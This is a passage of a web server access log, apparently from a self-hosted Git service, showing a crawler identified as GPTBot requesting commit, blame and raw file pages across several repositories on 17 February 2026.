"/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1752074] [Gzip 24.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10912] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:13:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:13:13:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:13:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" [Client 74.7.227.38] [Length 11653] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:13:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:13:13:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" -[17/Feb/2026:13:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 15233] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.patch" [Client 74.7.227.38] [Length 663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata" [Client 74.7.227.38] [Length 52984] [Gzip 10.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" [Client 74.7.227.38] [Length 11034] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" -[17/Feb/2026:13:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 28975] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009046] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10164] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 19731] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:13:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:13:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:13:14:00 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:13:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 28979] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" [Client 74.7.227.38] [Length 10292] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:13:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:13:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 30211] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 14651] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 15505] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" -[17/Feb/2026:13:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" -[17/Feb/2026:13:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" -[17/Feb/2026:13:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" -[17/Feb/2026:13:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" -[17/Feb/2026:13:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" -[17/Feb/2026:13:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" [Client 74.7.227.38] [Length 10954] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" -[17/Feb/2026:13:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" [Client 74.7.227.38] [Length 10757] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" -[17/Feb/2026:13:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata" [Client 74.7.227.38] [Length 23397] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:13:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:13:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 14914] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 14904] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" [Client 74.7.227.38] [Length 11442] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 106880] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 191009] [Gzip 11.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" [Client 74.7.227.38] [Length 10121] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 106881] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 191755] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 11291] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 11940] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" [Client 74.7.227.38] [Length 9839] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:13:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 74.7.227.38] [Length 14244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:13:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 14391] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:13:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" [Client 74.7.227.38] [Length 10403] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" -[17/Feb/2026:13:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 